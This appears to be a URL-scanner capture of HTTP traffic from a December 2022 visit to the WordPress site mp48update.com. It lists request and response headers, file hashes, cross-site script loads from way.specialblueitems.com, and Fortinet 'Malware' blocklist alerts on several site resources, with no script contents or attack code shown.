Sha256: 7e4583ae78ab597639f53669ac2d67d1ebd26be3278c2fc3fc95af934178c116
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fd7b1b2f1-0b18-4097-a282-a7ddd9b33b97.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 6637
x-amzn-requestid: dfcef102-5fc6-4a59-bb21-ff0532c9fdda
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cvlg4GtVIAMFdTw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-638fb605-0c2f58da0ae148fb4d698ecc;Sampled=0
x-amzn-remapped-date: Tue, 06 Dec 2022 21:37:09 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: jQs6m8oGHeWNYbOnPM34f-YW75VuH0yNWU-TzoDMOkYcwGa9BfqBhA==
via: 1.1 d83ae0e1ba84e92e58bc1efc23a0c652.cloudfront.net (CloudFront), 1.1 ce71f64ad5dca81beca846466f2d5008.cloudfront.net (CloudFront), 1.1 google
date: Thu, 08 Dec 2022 21:51:22 GMT
age: 24634
etag: "4946fcab2a99d926c45abaecf8f97b6214dee0cd"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6637
Md5:    3cb7655c8fe89a83f0096c51684aa21c
Sha1:   4946fcab2a99d926c45abaecf8f97b6214dee0cd
Sha256: 60a3066f2dcc2f696413ecec56ef1d0c1a9392f6845fac5c4319b8b9e02074fd
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F9c8ed2c5-144c-4fce-bb57-7d9918c1ab31.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 4049
x-amzn-requestid: dbde9a26-7609-43b7-a9a5-6e4d2f559989
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cpwRFHIooAMFVmw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-638d60d3-5f5131b8315a458d18cdc70f;Sampled=0
x-amzn-remapped-date: Mon, 05 Dec 2022 03:09:07 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: 0hIxbSpQqCv6Ud-7HmBaRxkFrdLYrV-Lr2u3nIzd8jPXpQ8E7ahp1g==
via: 1.1 1b0911478686968732f973d6e5e31d10.cloudfront.net (CloudFront), 1.1 61bc723adb3b1884ed759711e84e13a8.cloudfront.net (CloudFront), 1.1 google
date: Thu, 08 Dec 2022 11:18:08 GMT
age: 62628
etag: "0b3fe77e142178561b28c93b94b1aea2e1c395a5"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   4049
Md5:    44ed82780732ed682ee46b2df52b3ca2
Sha1:   0b3fe77e142178561b28c93b94b1aea2e1c395a5
Sha256: 383da5ca2927044c69ff1d10b630fe3439ca48f1845031ef1b6607fcd054c54b
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Ffe7732c6-dc98-445c-86c6-d413942250ea.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 10205
x-amzn-requestid: c5704c7a-60c4-402b-8018-5885a8dae971
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cwVM_F9BIAMF3ow=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63900252-3e9573d900714e3250f43e17;Sampled=0
x-amzn-remapped-date: Wed, 07 Dec 2022 03:02:42 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: mLTL7L808-OguYGrl3FUvwmFmPQjBPRj7PVfgEheFHWg4g4skoBvOg==
via: 1.1 26ca01ec7377e425b59b6a08cb1ec342.cloudfront.net (CloudFront), 1.1 6a9b42e38e76b7d4a4044ebe0e0eca08.cloudfront.net (CloudFront), 1.1 google
date: Thu, 08 Dec 2022 18:05:28 GMT
age: 38188
etag: "1e492807c665e6e6b24ec6ce19035fdfc6f23b92"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   10205
Md5:    45e0c1638ad919bde19731f7987ab064
Sha1:   1e492807c665e6e6b24ec6ce19035fdfc6f23b92
Sha256: f0d3738ec8406958470c8fd152a02a123d7654c30f974c1df5c4977a380c2d62
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 09 Dec 2022 04:41:57 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 09 Dec 2022 04:41:57 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 09 Dec 2022 04:41:57 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "08C61813373B17EE51FEC317648C02AB60F6FD69A71B8FE89BEBA0D589390CD4"
Last-Modified: Wed, 07 Dec 2022 17:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=4184
Expires: Fri, 09 Dec 2022 05:51:41 GMT
Date: Fri, 09 Dec 2022 04:41:57 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "08C61813373B17EE51FEC317648C02AB60F6FD69A71B8FE89BEBA0D589390CD4"
Last-Modified: Wed, 07 Dec 2022 17:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=4184
Expires: Fri, 09 Dec 2022 05:51:41 GMT
Date: Fri, 09 Dec 2022 04:41:57 GMT
Connection: keep-alive

                                        
                                            GET /gtag/js?id=G-VS9R69MEY9 HTTP/1.1 
Host: www.googletagmanager.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://mp48update.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         172.217.21.168
HTTP/2 200 OK
content-type: application/javascript; charset=UTF-8
                                        
access-control-allow-origin: *
access-control-allow-credentials: true
access-control-allow-headers: Cache-Control
content-encoding: br
vary: Accept-Encoding
date: Fri, 09 Dec 2022 04:41:57 GMT
expires: Fri, 09 Dec 2022 04:41:57 GMT
cache-control: private, max-age=900
strict-transport-security: max-age=31536000; includeSubDomains
cross-origin-resource-policy: cross-origin
server: Google Tag Manager
content-length: 76901
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (22462)
Size:   76901
Md5:    0c719f5f3bfdebdd9195896798e7649b
Sha1:   68fe48353e5445e10c80e2f71c837887ff5064e7
Sha256: 0d7fc87cc8321c12aacbf3e8a6e45db7bbf5a24b59e3cf29bd764fc807d1905e
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 09 Dec 2022 04:41:57 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 09 Dec 2022 04:41:57 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /src/main.js?v=1.0.1 HTTP/1.1 
Host: way.specialblueitems.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://mp48update.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         159.69.234.10
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 09 Dec 2022 04:41:57 GMT
Last-Modified: Wed, 07 Dec 2022 11:43:11 GMT
Transfer-Encoding: chunked
Connection: keep-alive
ETag: W/"63907c4f-2604"
Expires: Mon, 19 Dec 2022 04:41:57 GMT
Cache-Control: max-age=864000
Access-Control-Allow-Origin: *
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with very long lines (9732), with no line terminators
Size:   3052
Md5:    ee4886936efcd6c7fe2c0f50c46eb551
Sha1:   3f77bc1685ae4f90bee11c721d55f33df2ff0200
Sha256: ff312b49979047eaad5715d1519775ef8409b9a2d4c436888ab7d06221889561
                                        
                                            GET /src/main.js?v=3.0.3 HTTP/1.1 
Host: way.specialblueitems.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://mp48update.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         159.69.234.10
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 09 Dec 2022 04:41:57 GMT
Last-Modified: Wed, 07 Dec 2022 11:43:11 GMT
Transfer-Encoding: chunked
Connection: keep-alive
ETag: W/"63907c4f-2604"
Expires: Mon, 19 Dec 2022 04:41:57 GMT
Cache-Control: max-age=864000
Access-Control-Allow-Origin: *
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with very long lines (9732), with no line terminators
Size:   3052
Md5:    ee4886936efcd6c7fe2c0f50c46eb551
Sha1:   3f77bc1685ae4f90bee11c721d55f33df2ff0200
Sha256: ff312b49979047eaad5715d1519775ef8409b9a2d4c436888ab7d06221889561
                                        
                                            GET /src/main.js?v=4.0.4 HTTP/1.1 
Host: way.specialblueitems.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://mp48update.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         159.69.234.10
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 09 Dec 2022 04:41:57 GMT
Last-Modified: Wed, 07 Dec 2022 11:43:11 GMT
Transfer-Encoding: chunked
Connection: keep-alive
ETag: W/"63907c4f-2604"
Expires: Mon, 19 Dec 2022 04:41:57 GMT
Cache-Control: max-age=864000
Access-Control-Allow-Origin: *
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with very long lines (9732), with no line terminators
Size:   3052
Md5:    ee4886936efcd6c7fe2c0f50c46eb551
Sha1:   3f77bc1685ae4f90bee11c721d55f33df2ff0200
Sha256: ff312b49979047eaad5715d1519775ef8409b9a2d4c436888ab7d06221889561
                                        
                                            GET /wp-content/plugins/td-composer/td-multi-purpose/style.css?ver=6ea45b81e47c58269b68289d05535e19 HTTP/1.1 
Host: mp48update.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://mp48update.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         64.90.37.168
HTTP/2 200 OK
content-type: text/css
                                        
date: Fri, 09 Dec 2022 04:41:57 GMT
server: Apache
vary: IS_SUBREQ,Accept-Encoding,User-Agent
last-modified: Thu, 18 Aug 2022 08:30:08 GMT
etag: "92ec-5e67fca0b0179-gzip"
accept-ranges: bytes
cache-control: max-age=2592000
expires: Sun, 08 Jan 2023 04:41:57 GMT
content-encoding: gzip
content-length: 5030
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (37612), with no line terminators
Size:   5030
Md5:    09f3683c5bbd61c1e85570655cf3ed85
Sha1:   31f9e644bb1eee1559648e0f391db8c54cf58281
Sha256: 241f85fe3c3e0a3bc34da8b971e3234c8134b09860b798590b03d0bf32c4faa1

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/live-news/public/assets/css/general.css?ver=2.10 HTTP/1.1 
Host: mp48update.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://mp48update.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         64.90.37.168
HTTP/2 200 OK
content-type: text/css
                                        
date: Fri, 09 Dec 2022 04:41:57 GMT
server: Apache
vary: IS_SUBREQ,Accept-Encoding,User-Agent
last-modified: Thu, 18 Aug 2022 19:24:52 GMT
etag: "1555-5e688ef8ad5cd-gzip"
accept-ranges: bytes
cache-control: max-age=2592000
expires: Sun, 08 Jan 2023 04:41:57 GMT
content-encoding: gzip
content-length: 1064
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   1064
Md5:    817e322d3bfa20f121fbead2c6fd6351
Sha1:   1a52eb464dabe927779d164cc81cb76bf4eb36b6
Sha256: 00617bafc42112bc18719a55cb0c9d9a69f385dca26ced8286842e6838569b5d

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-includes/css/classic-themes.min.css?ver=1 HTTP/1.1 
Host: mp48update.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://mp48update.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         64.90.37.168
HTTP/2 200 OK
content-type: text/css
                                        
date: Fri, 09 Dec 2022 04:41:57 GMT
server: Apache
vary: IS_SUBREQ,Accept-Encoding,User-Agent
last-modified: Wed, 02 Nov 2022 06:10:46 GMT
etag: "d9-5ec76b390c223-gzip"
accept-ranges: bytes
cache-control: max-age=2592000
expires: Sun, 08 Jan 2023 04:41:57 GMT
content-encoding: gzip
content-length: 189
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   189
Md5:    5a18e16eb01cbaa862eb32e6b77bedb2
Sha1:   3abf9b913cc9f558f02cba7c9b822f8d1812cb96
Sha256: d2b5af913332941d5ae7786d1fa70e0d009315c4ede6ad5b80d0f663bb54521f
                                        
                                            GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1 
Host: mp48update.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://mp48update.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         64.90.37.168
HTTP/2 200 OK
content-type: application/javascript
                                        
date: Fri, 09 Dec 2022 04:41:57 GMT
server: Apache
vary: IS_SUBREQ,Accept-Encoding,User-Agent
last-modified: Wed, 18 Nov 2020 09:06:06 GMT
etag: "2bd8-5b45debe27b80-gzip"
accept-ranges: bytes
cache-control: max-age=2592000
expires: Sun, 08 Jan 2023 04:41:57 GMT
content-encoding: gzip
content-length: 4204
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (11126)
Size:   4204
Md5:    a65d5500f76589b8c41c6d1e8895c456
Sha1:   fc9b5b82c4a5c6973efcbca5f6ca01a5eb252a59
Sha256: 9cb0e5695834af1b05fa4e3699dc7be10857e491c8c511edb63ed7f337083d1d

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/td-composer/assets/fonts/td-multipurpose/td-multipurpose.css?ver=6ea45b81e47c58269b68289d05535e19 HTTP/1.1 
Host: mp48update.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://mp48update.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         64.90.37.168
HTTP/2 200 OK
content-type: text/css
                                        
date: Fri, 09 Dec 2022 04:41:57 GMT
server: Apache
vary: IS_SUBREQ,Accept-Encoding,User-Agent
last-modified: Thu, 18 Aug 2022 08:29:58 GMT
etag: "2ee1-5e67fc970677d-gzip"
accept-ranges: bytes
cache-control: max-age=2592000
expires: Sun, 08 Jan 2023 04:41:57 GMT
content-encoding: gzip
content-length: 2049
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   2049
Md5:    b8ed937799c607f24be4fcfbb3537683
Sha1:   9a8daf8e69865df8ccfa6cefa645a58c568a7bf5
Sha256: 8e0ceb73f3e18abbfd035206756fe2d2ea9af639ab4376cc8c308f9997df1a2a

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/live-news/public/assets/js/general.js?ver=2.10 HTTP/1.1 
Host: mp48update.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://mp48update.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         64.90.37.168
HTTP/2 200 OK
content-type: application/javascript
                                        
date: Fri, 09 Dec 2022 04:41:57 GMT
server: Apache
vary: IS_SUBREQ,Accept-Encoding,User-Agent
last-modified: Thu, 18 Aug 2022 19:24:52 GMT
etag: "3952-5e688ef8b04ad-gzip"
accept-ranges: bytes
cache-control: max-age=2592000
expires: Sun, 08 Jan 2023 04:41:57 GMT
content-encoding: gzip
content-length: 3436
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (492), with CRLF line terminators
Size:   3436
Md5:    3732fc98011e5412492a4e3c40a2c9a8
Sha1:   c213eceb1d9dc1d6b061c75145a4540662692d82
Sha256: d9993d5eafc162642e1984030bec2aaf4e75ef023b9f56ba0e725e2ea0dff088
                                        
                                            GET /wp-includes/css/dist/block-library/style.min.css?ver=6.1.1 HTTP/1.1 
Host: mp48update.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://mp48update.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         64.90.37.168
HTTP/2 200 OK
content-type: text/css
                                        
date: Fri, 09 Dec 2022 04:41:57 GMT
server: Apache
vary: IS_SUBREQ,Accept-Encoding,User-Agent
last-modified: Wed, 16 Nov 2022 07:53:33 GMT
etag: "172a9-5ed91c4eedbcb-gzip"
accept-ranges: bytes
cache-control: max-age=2592000
expires: Sun, 08 Jan 2023 04:41:57 GMT
content-encoding: gzip
content-length: 12972
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (47826)
Size:   12972
Md5:    230215725aaa95357dab4851af106ffd
Sha1:   d928b57aa7af333dfdda0bc97922463065bf0c1b
Sha256: fe8f0af1002ddb91bc8baa0f8d743802e9b9c7dd444dd89267e22ba6d08ece5a

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/uploads/2022/08/MP48-UPDATE-logo-01-150x150.png HTTP/1.1 
Host: mp48update.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://mp48update.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         64.90.37.168
HTTP/2 200 OK
content-type: image/png
                                        
date: Fri, 09 Dec 2022 04:41:57 GMT
server: Apache
vary: IS_SUBREQ,User-Agent,Accept-Encoding
last-modified: Thu, 18 Aug 2022 18:55:47 GMT
etag: "287c-5e6888786b3ce"
accept-ranges: bytes
content-length: 10364
cache-control: max-age=2592000
expires: Sun, 08 Jan 2023 04:41:57 GMT
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced\012- data
Size:   10364
Md5:    3a23696dc78942d47d32d17a96e195e6
Sha1:   ba9e977635e3d76a84ae3fe7fe31f4d8309f24e8
Sha256: 62ea4849809a86cbfe7d2869a24f3238bbcd9538eb514dc1245a75f360bdecfe
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 4038
Cache-Control: max-age=164687
Date: Fri, 09 Dec 2022 04:41:57 GMT
Etag: "63928d1e-1d7"
Expires: Sun, 11 Dec 2022 02:26:44 GMT
Last-Modified: Fri, 09 Dec 2022 01:19:26 GMT
Server: ECS (ska/F6FE)
X-Cache: HIT
Content-Length: 471

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 115
Cache-Control: max-age=146695
Date: Fri, 09 Dec 2022 04:41:57 GMT
Etag: "6392562a-1d7"
Expires: Sat, 10 Dec 2022 21:26:52 GMT
Last-Modified: Thu, 08 Dec 2022 21:24:58 GMT
Server: ECS (ska/F6FE)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /wp-content/uploads/2022/08/MP48-UPDATE-logo-01.png HTTP/1.1 
Host: mp48update.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://mp48update.com/
Sec-Fetch-Dest: image
